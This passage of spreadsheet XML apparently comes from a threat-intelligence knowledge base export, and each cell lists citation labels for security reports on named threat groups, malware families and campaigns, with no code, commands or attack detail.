    <t>(Citation: CISA AA21-200A APT40 July 2021),(Citation: ESET Dukes October 2019),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Juniper IcedID June 2020),(Citation: Talos Group123),(Citation: Fortinet Diavol July 2021),(Citation: Securelist ScarCruft May 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: Trend Micro Tick November 2019),(Citation: ESET Operation Spalax Jan 2021),(Citation: Unit 42 TA551 Jan 2021),(Citation: GitHub Invoke-PSImage),(Citation: Kaspersky Andariel Ransomware June 2021),(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021),(Citation: Unit42 RDAT July 2020),(Citation: CheckPoint Bandook Nov 2020),(Citation: Symantec RAINDROP January 2021),(Citation: ESET Okrum July 2019),(Citation: Group IB Ransomware September 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Volexity PowerDuke November 2016),(Citation: Antiy CERT Ramsay April 2020),(Citation: Talos Oblique RAT March 2021),</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs reversing run-only applescripts 2021),</t>
  </si>
  <si>
    <t>(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Symantec Palmerworm Sep 2020),(Citation: IBM MegaCortex),(Citation: ESET Lazarus Jun 2020),</t>
  </si>
  <si>
    <t>(Citation: Phish Labs Silent Librarian),(Citation: CISA AppleJeus Feb 2021),(Citation: Secureworks COBALT DICKENS September 2019),(Citation: McAfee Honeybee),(Citation: ESET PLEAD Malware July 2018),</t>
  </si>
  <si>
    <t>(Citation: KISA Operation Muzabi),</t>
  </si>
  <si>
    <t>(Citation: FSI Andariel Campaign Rifle July 2017),(Citation: NSA NCSC Turla OilRig),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: McAfee Night Dragon),(Citation: Mandiant APT1),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Recorded Future Turla Infra 2020),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: DFIR Conti Bazar Nov 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: ESET Operation Spalax Jan 2021),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: NCC Group TA505),(Citation: ESET BackdoorDiplomacy Jun 2021),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Volexity Patchwork June 2018),(Citation: SecureList Silence Nov 2017),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: NCC Group TA505),(Citation: FireEye APT33 Guardrail),(Citation: Group IB Silence Aug 2019),(Citation: NCC Group APT15 Alive and Strong),(Citation: Kaspersky Carbanak),(Citation: RedCanary Mockingbird May 2020),(Citation: Cylance Cleaver),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Secureworks COBALT DICKENS September 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Symantec Palmerworm Sep 2020),(Citation: Dell TG-3390),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Cycraft Chimera April 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Check Point Rocket Kitten),(Citation: Mandiant No Easy Breach),(Citation: FireEye APT28 Hospitality Aug 2017),(Citation: Symantec Leafminer July 2018),(Citation: McAfee Night Dragon),(Citation: Symantec Whitefly March 2019),(Citation: FireEye APT35 2018),(Citation: FireEye APT29 Nov 2018),(Citation: Symantec Elfin Mar 2019),(Citation: Microsoft POLONIUM June 2022),(Citation: FoxIT Wocao December 2019),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: DFIR Conti Bazar Nov 2021),(Citation: ESET Lazarus KillDisk April 2018),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Talos Frankenstein June 2019),(Citation: Securelist APT Trends Q2 2017),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Palo Alto Sofacy 06-2018),(Citation: Checkpoint IndigoZebra July 2021),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Microsoft GALLIUM December 2019),(Citation: FireEye APT32 May 2017),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Mandiant APT1),(Citation: Lab52 WIRTE Apr 2019),(Citation: Anomali Static Kitten February 2021),(Citation: Talos Kimsuky Nov 2021),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: ClearSky Lazarus Aug 2020),(Citation: Symantec Thrip June 2018),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Symantec Waterbug Jun 2019),(Citation: Mandiant UNC3890 Aug 2022),(Citation: NCSC Joint Report Public Tools),(Citation: Securelist DarkVishnya Dec 2018),(Citation: FireEye FIN10 June 2017),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Unit42 Emissary Panda May 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye TRITON 2019),(Citation: FireEye APT19),(Citation: IBM ITG07 June 2019),(Citation: BitDefender Chafer May 2020),(Citation: ESET Lazarus Jun 2020),(Citation: F-Secure The Dukes),(Citation: Kaspersky Lyceum October 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Bizeul 2014),(Citation: ESET Operation Spalax Jan 2021),(Citation: FireEye FIN6 Apr 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Proofpoint TA407 September 2019),(Citation: SecureWorks August 2019),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Securelist Sofacy Feb 2018),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: Symantec Tick Apr 2016),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: ClearSky and Trend Micro Operation Wilted Tulip July 2017),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),</t>
  </si>
  <si>
    <t>(Citation: Cybereason Oceanlotus May 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ESET Gamaredon June 2020),(Citation: win10_asr),(Citation: SensePost Outlook Forms),(Citation: Palo Alto Office Test Sofacy),(Citation: SensePost Outlook Home Page),(Citation: MRWLabs Office Persistence Add-ins)</t>
  </si>
  <si>
    <t>(Citation: Talos Bisonal Mar 2020),(Citation: CheckPoint Naikon May 2020),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>(Citation: Reaqta MuddyWater November 2017),(Citation: Unit 42 BackConfig May 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: win10_asr),(Citation: MRWLabs Office Persistence Add-ins)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Office Test Sofacy),(Citation: win10_asr),(Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>(Citation: SensePost Ruler GitHub),(Citation: win10_asr),(Citation: SensePost Outlook Home Page),(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t>(Citation: SensePost Ruler GitHub),(Citation: FireEye Outlook Dec 2019),(Citation: win10_asr),(Citation: SensePost Outlook Home Page),(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t>(Citation: FireEye Targeted Attacks Middle East Banks),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: GitHub PoshC2),(Citation: CME Github September 2018),(Citation: Savill 1999),(Citation: ESET ComRAT May 2020),(Citation: Symantec Orangeworm April 2018),(Citation: CrowdStrike BloodHound April 2018),(Citation: NCC Group Chimera January 2021),(Citation: Microsoft Install Password Filter n.d)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky TajMahal April 2019),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Check Point APT34 April 2021),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Eset Ramsay May 2020),(Citation: ESET ComRAT May 2020),(Citation: EFF Manul Aug 2016),(Citation: Cisco Talos Intelligence Group),(Citation: Trend Micro njRAT 2018),(Citation: Palo Alto T9000 Feb 2016),(Citation: Unit42 Cannon Nov 2018),(Citation: Securelist BlackEnergy Nov 2014),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Trend Micro Qakbot May 2020),(Citation: ESET Sednit Part 2),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: Securelist ScarCruft May 2019),(Citation: Kaspersky WIRTE November 2021),(Citation: Unit42 Redaman January 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: ESET Crutch December 2020),(Citation: Kaspersky MoleRATs April 2019),(Citation: Palo Alto MoonWind March 2017),(Citation: Microsoft Actinium February 2022),(Citation: ESET Sednit USBStealer 2014),(Citation: Prevailion DarkWatchman 2021),(Citation: ESET Machete July 2019),(Citation: Kaspersky Adwind Feb 2016),(Citation: ESET Operation Groundbait),(Citation: FireEye WannaCry 2017),(Citation: ESET RTM Feb 2017),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Sophos Ragnar May 2020),(Citation: Fidelis njRAT June 2013),(Citation: Proofpoint TA505 Mar 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Forcepoint Monsoon),(Citation: Microsoft SIR Vol 19),(Citation: ESET Attor Oct 2019),(Citation: Antiy CERT Ramsay April 2020),(Citation: Talos Oblique RAT March 2021),(Citation: Symantec Chafer Dec 2015),(Citation: Kaspersky Equation QA),</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),(Citation: IBM TA505 April 2020),(Citation: FireEye Periscope March 2018),(Citation: Cyberreason Anchor December 2019),(Citation: Symantec Buckeye),(Citation: Trend Micro TA505 June 2019),(Citation: IBM IcedID November 2017),(Citation: FOX-IT May 2016 Mofang),(Citation: GovCERT Carbon May 2016),(Citation: Unit 42 Siloscape Jun 2021),</t>
  </si>
  <si>
    <t>(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: TechNet Dsquery),(Citation: ESET ComRAT May 2020),(Citation: CISA SoreFang July 2016),(Citation: Secureworks REvil September 2019),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: FireEye FIN6 Apr 2019),(Citation: Symantec Orangeworm April 2018),(Citation: CrowdStrike BloodHound April 2018),(Citation: Symantec Inception Framework March 2018),(Citation: CISA WellMess July 2020),(Citation: FireEye APT34 Dec 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: CME Github September 2018),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Palo Alto OilRig May 2016),(Citation: Unit 42 Playbook Dec 2017),(Citation: Savill 1999),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Kaspersky Sodin July 2019),(Citation: Symantec Bumblebee June 2022),(Citation: US-CERT TA18-074A),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Symantec Buckeye),(Citation: SecureList Griffon May 2019),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Intrinsec Egregor Nov 2020),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: GitHub PoshC2),(Citation: Korean FSI TA505 2020),(Citation: NTT Security Flagpro new December 2021),(Citation: ESET ComRAT May 2020),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Baumgartner Naikon 2015),(Citation: Kaspersky Lyceum October 2021),(Citation: Emissary Trojan Feb 2016),(Citation: Symantec Orangeworm April 2018),(Citation: CrowdStrike BloodHound April 2018),(Citation: FireEye APT34 Dec 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Kaspersky Turla Aug 2014),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Unit 42 Kazuar May 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: Savill 1999),(Citation: FireEye admin@338),(Citation: FoxIT Wocao December 2019),(Citation: Proofpoint TA505 Mar 2018),(Citation: Microsoft PLATINUM April 2016),(Citation: TrendMicro Tonto Team October 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Symantec Buckeye),(Citation: DFIR Conti Bazar Nov 2021),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),(Citation: Secureworks REvil September 2019),(Citation: Cisco Group 72),(Citation: ACSC Email Spoofing),(Citation: Microsoft Anti Spoofing)</t>
  </si>
  <si>
    <t>(Citation: Google Election Threats October 2020),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Microsoft Targeting Elections September 2020),(Citation: ACSC Email Spoofing),(Citation: Microsoft Anti Spoofing)</t>
  </si>
  <si>
    <t>(Citation: US-CERT TA18-074A),(Citation: ATT Sidewinder January 2021),(Citation: Cyble Sidewinder September 2020),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ACSC Email Spoofing),(Citation: Microsoft Anti Spoofing)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: VirusBulletin Kimsuky October 2019),(Citation: Proofpoint TA453 July2021),(Citation: KISA Operation Muzabi),(Citation: FireEye Shining A Light on DARKSIDE May 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: AADInternals Documentation),(Citation: Proofpoint TA407 September 2019),(Citation: Proofpoint TA453 March 2021),(Citation: ATT Sidewinder January 2021),(Citation: Certfa Charming Kitten January 2021),(Citation: Volexity Ocean Lotus November 2020),(Citation: Phish Labs Silent Librarian),(Citation: DOJ Iran Indictments March 2018),(Citation: Secureworks COBALT DICKENS September 2019),(Citation: US-CERT TA18-074A),(Citation: Secureworks COBALT DICKENS August 2018),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Malwarebytes Silent Librarian October 2020),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: ACSC Email Spoofing),(Citation: Microsoft Anti Spoofing)</t>
  </si>
  <si>
    <t>(Citation: Microsoft DUBNIUM July 2016),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: Carbon Black HotCroissant April 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: KISA Operation Muzabi),(Citation: PTSecurity Cobalt Dec 2016),(Citation: ESET T3 Threat Report 2021),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Accenture MUDCARP March 2019),(Citation: Cybereason Molerats Dec 2020),(Citation: Volexity Patchwork June 2018),(Citation: Proofpoint TA505 June 2018),(Citation: SecureList Silence Nov 2017),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: ESET Casbaneiro Oct 2019),(Citation: Trend Micro Qakbot May 2020),(Citation: ESET OceanLotus),(Citation: TrendMicro Gamaredon April 2020),(Citation: Carbon Black Emotet Apr 2019),(Citation: Trend Micro TA505 June 2019),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Talos PoetRAT April 2020),(Citation: US-CERT Ukraine Feb 2016),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Lazarus APT January 2022),(Citation: CSM Elderwood Sept 2012),(Citation: Unit 42 Gamaredon February 2022),(Citation: Trend Micro Emotet Jan 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: TrendMicro Taidoor),(Citation: Unit 42 Playbook Dec 2017),(Citation: McAfee Bankshot),(Citation: Trend Micro Qakbot December 2020),(Citation: Securelist Dropping Elephant),(Citation: Kaspersky QakBot September 2021),(Citation: CrowdStrike Grim Spider May 2019),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gamaredon June 2020),(Citation: Malwarebytes Saint Bot April 2021),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: FireEye Hancitor),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Talos Oblique RAT March 2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: Proofpoint TA459 April 2017),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Google EXOTIC LILY March 2022),(Citation: Cybereason Oceanlotus May 2017),(Citation: VirusBulletin Kimsuky October 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Check Point Rocket Kitten),(Citation: eSentire FIN7 July 2021),(Citation: 360 Machete Sep 2020),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Proofpoint TA416 November 2020),(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Symantec Emotet Jul 2018),(Citation: Malwarebytes Konni Aug 2021),(Citation: Bitdefender Agent Tesla April 2020),(Citation: G Data Sodinokibi June 2019),(Citation: Symantec Elderwood Sept 2012),(Citation: ThreatConnect Kimsuky September 2020),(Citation: Talos Bisonal Mar 2020),(Citation: TrendMicro TropicTrooper 2015),(Citation: Securelist ScarCruft May 2019),(Citation: Secureworks GOLD CABIN),(Citation: Unit 42 Phishery Aug 2018),(Citation: Kaspersky WIRTE November 2021),(Citation: Cybereason Bumblebee August 2022),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Symantec Inception Framework March 2018),(Citation: FireEye APT29 Nov 2018),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Picus Sodinokibi January 2020),(Citation: Unit 42 Valak July 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: RiskIQ Cobalt Nov 2017),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: ProofPoint SettingContent-ms July 2018),(Citation: FireEye APT39 Jan 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Rancor Unit42 June 2018),(Citation: Symantec Bumblebee June 2022),(Citation: IBM TA505 April 2020),(Citation: Unit42 Molerat Mar 2020),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: CitizenLab Tropic Trooper Aug 2018),(Citation: Proofpoint TA505 Mar 2018),(Citation: TrendMicro Tonto Team October 2020),(Citation: FireEye APT37 Feb 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: CIS Emotet Apr 2017),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Malwarebytes Pony April 2016),(Citation: Talos Frankenstein June 2019),(Citation: Uptycs Confucius APT Jan 2021),(Citation: FireEye FIN7 April 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: SANS Windshift August 2018),(Citation: FireEye APT10 Sept 2018),(Citation: Talos Lokibot Jan 2021),(Citation: Proofpoint TA505 October 2019),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Qualys LolZarus),(Citation: FireEye APT10 April 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Palo Alto Sofacy 06-2018),(Citation: NTT Security Flagpro new December 2021),(Citation: Gigamon Berserk Bear October 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Malwarebytes Higaisa 2020),(Citation: Checkpoint IndigoZebra July 2021),(Citation: FireEye APT32 April 2020),(Citation: Unit 42 ProjectM March 2016),(Citation: MSTIC NOBELIUM May 2021),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Mandiant APT1),(Citation: Talos Group123),(Citation: Proofpoint Cobalt June 2017),(Citation: Anomali Static Kitten February 2021),(Citation: ESET Telebots Dec 2016),(Citation: Group IB Cobalt Aug 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Unit 42 NETWIRE April 2020),(Citation: FireEye APT30),(Citation: Symantec Chafer February 2018),(Citation: Trend Micro Tick November 2019),(Citation: ClearSky MuddyWater June 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Security Affairs DustSquad Oct 2018),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Unit 42 TA551 Jan 2021),(Citation: Unit42 Redaman January 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Zdnet Kimsuky Dec 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Unit 42 Inception November 2018),(Citation: CheckPoint Naikon May 2020),(Citation: ESET Machete July 2019),(Citation: ESET Nomadic Octopus 2018),(Citation: iSight Sandworm Oct 2014),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: ATT Sidewinder January 2021),(Citation: Prevailion DarkWatchman 2021),(Citation: Check Point Warzone Feb 2020),(Citation: Malwarebytes Emotet Dec 2017),(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021),(Citation: CERT-EE Gamaredon January 2021),(Citation: FireEye admin@338),(Citation: CheckPoint Bandook Nov 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: Cymmetria Patchwork),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Proofpoint TA505 Sep 2017),(Citation: Zscaler Higaisa 2020),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye APT19),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: McAfee Oceansalt Oct 2018),(Citation: Securelist Kimsuky Sept 2013),(Citation: FBI FLASH APT39 September 2020),(Citation: Antiy CERT Ramsay April 2020),(Citation: FireEye Obfuscation June 2017),(Citation: TrendMicro BlackTech June 2017),(Citation: Picus Emotet Dec 2018),(Citation: Cybereason Kimsuky November 2020),(Citation: Recorded Future REDDELTA July 2020),(Citation: Cybereason TA505 April 2019),(Citation: Flashpoint FIN 7 March 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Microsoft Holmium June 2020),(Citation: Moran 2014),(Citation: ESET Dukes October 2019),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Cyberint Qakbot May 2021),(Citation: Kroll Qakbot June 2020),(Citation: F-Secure The Dukes),(Citation: Secureworks REvil September 2019),(Citation: Sofacy DealersChoice),(Citation: FireEye Fin8 May 2016),(Citation: Juniper IcedID June 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Talos Cobalt Group July 2018),(Citation: Cybereason Chaes Nov 2020),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: ESET Operation Spalax Jan 2021),(Citation: Cylance Sodinokibi July 2019),(Citation: Talos Transparent Tribe May 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: Trend Micro IXESHE 2012),(Citation: Secureworks IRON HEMLOCK Profile),(Citation: Microsoft Actinium February 2022),(Citation: US-CERT Emotet Jul 2018),(Citation: Anomali Pirate Panda April 2020),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: Securelist Machete Aug 2014),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: IBM IcedID November 2017),(Citation: FOX-IT May 2016 Mofang),(Citation: SecureWorks August 2019),(Citation: DOJ FIN7 Aug 2018),(Citation: ATT QakBot April 2021),(Citation: Securelist Sofacy Feb 2018),(Citation: Trend Micro Muddy Water March 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Proofpoint NETWIRE December 2020),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Talos Emotet Jan 2019),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Visa FIN6 Feb 2019),(Citation: HackerNews IndigoZebra July 2021),(Citation: Securelist Darkhotel Aug 2015),(Citation: Secureworks IRON TILDEN Profile),(Citation: Microsoft PLATINUM April 2016),(Citation: Group IB RTM August 2019),(Citation: McAfee Lazarus Jul 2020),(Citation: Symantec Tick Apr 2016),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Group IB Ransomware September 2020),(Citation: Symantec Gallmaker Oct 2018),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: Group IB Silence Sept 2018),(Citation: Proofpoint TA505 Jan 2019),(Citation: ACSC Email Spoofing),(Citation: Microsoft Anti Spoofing)</t>
  </si>
  <si>
    <t>(Citation: ESET EvilNum July 2020),(Citation: Proofpoint TA416 Europe March 2022),(Citation: KISA Operation Muzabi),(Citation: Volexity Patchwork June 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Trend Micro Qakbot May 2020),(Citation: ESET OceanLotus),(Citation: Trend Micro TA505 June 2019),(Citation: AADInternals Documentation),(Citation: TrendMicro EarthLusca 2022),(Citation: Secureworks IRON RITUAL USAID Phish May 2021),(Citation: FireEye Clandestine Wolf),(Citation: CSM Elderwood Sept 2012),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: Volexity Ocean Lotus November 2020),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Trend Micro Qakbot December 2020),(Citation: Secureworks Cobalt Gypsy Feb 2017),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Kaspersky QakBot September 2021),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Trend Micro Banking Malware Jan 2019),(Citation: Talos Oblique RAT March 2021),(Citation: Google EXOTIC LILY March 2022),(Citation: Cybereason Oceanlotus May 2017),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandiant No Easy Breach),(Citation: Threatpost Hancitor),(Citation: Cylance Machete Mar 2017),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: CISA AppleJeus Feb 2021),(Citation: Symantec Emotet Jul 2018),(Citation: Symantec Elderwood Sept 2012),(Citation: IBM Grandoreiro April 2020),(Citation: McAfee Night Dragon),(Citation: Cybereason Bazar July 2020),(Citation: Cybereason Bumblebee August 2022),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: McAfee Dianxun March 2021),(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT39 Jan 2019),(Citation: Certfa Charming Kitten January 2021),(Citation: FireEye APT33 Sept 2017),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: SentinelOne Valak June 2020),(Citation: CIS Emotet Apr 2017),(Citation: Cyble Sidewinder September 2020),(Citation: Malwarebytes Pony April 2016),(Citation: Symantec Patchwork),(Citation: SANS Windshift August 2018),(Citation: Google Election Threats October 2020),(Citation: Proofpoint TA505 October 2019),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: FireEye APT32 April 2020),(Citation: ESET Zebrocy May 2019),(Citation: MSTIC NOBELIUM May 2021),(Citation: Mandiant APT1),(Citation: Anomali Static Kitten February 2021),(Citation: Unit 42 NETWIRE April 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: ESET Grandoreiro April 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: ESET Machete July 2019),(Citation: ATT Sidewinder January 2021),(Citation: Malwarebytes Emotet Dec 2017),(Citation: Proofpoint TA505 Sep 2017),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: US District Court Indictment GRU Oct 2018),(Citation: ESET Turla Mosquito Jan 2018),(Citation: EST Kimsuky April 2019),(Citation: FBI FLASH APT39 September 2020),(Citation: TrendMicro BlackTech June 2017),(Citation: Picus Emotet Dec 2018),(Citation: CISA AA21-200A APT40 July 2021),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: Kroll Qakbot June 2020),(Citation: ESET Lazarus Jun 2020),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Talos Cobalt Group July 2018),(Citation: ESET Operation Spalax Jan 2021),(Citation: Kaspersky Emotet Jan 2019),(Citation: Zscaler Bazar September 2020),(Citation: Talos Transparent Tribe May 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: US-CERT Emotet Jul 2018),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: FOX-IT May 2016 Mofang),(Citation: ATT QakBot April 2021),(Citation: Microsoft Targeting Elections September 2020),(Citation: Trend Micro Muddy Water March 2021),(Citation: Talos Emotet Jan 2019),(Citation: Cyberreason Anchor December 2019),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Group IB Ransomware September 2020),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Proofpoint TA505 Jan 2019),(Citation: ACSC Email Spoofing),(Citation: Microsoft Anti Spoofing)</t>
  </si>
  <si>
